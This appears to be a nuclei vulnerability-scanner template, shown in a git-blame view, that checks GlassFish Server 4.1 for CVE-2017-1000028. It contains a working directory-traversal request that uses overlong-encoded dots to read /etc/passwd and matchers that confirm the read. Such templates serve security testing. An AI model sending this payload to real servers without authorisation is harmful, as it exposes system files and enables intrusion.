nuclei-templates/cves/2017/CVE-2017-1000028.yaml

24 lines
771 B
YAML
Raw Normal View History

2021-02-25 09:07:22 +00:00
id: CVE-2017-1000028
2021-02-16 08:38:42 +00:00
info:
2021-02-25 09:07:22 +00:00
name: GlassFish LFI
author: pikpikcu
severity: high
2021-04-18 13:00:27 +00:00
description: Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.
2021-02-25 09:07:22 +00:00
reference: https://www.exploit-db.com/exploits/45196
tags: cve,cve2017,oracle,glassfish,lfi
2021-02-16 08:38:42 +00:00
requests:
2021-02-25 09:07:22 +00:00
- method: GET
path:
- "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
matchers-condition: and
matchers:
- type: word
words:
- "/sbin/nologin"
part: body
2021-02-16 08:38:42 +00:00
- type: status
2021-02-25 09:07:22 +00:00
status:
- 200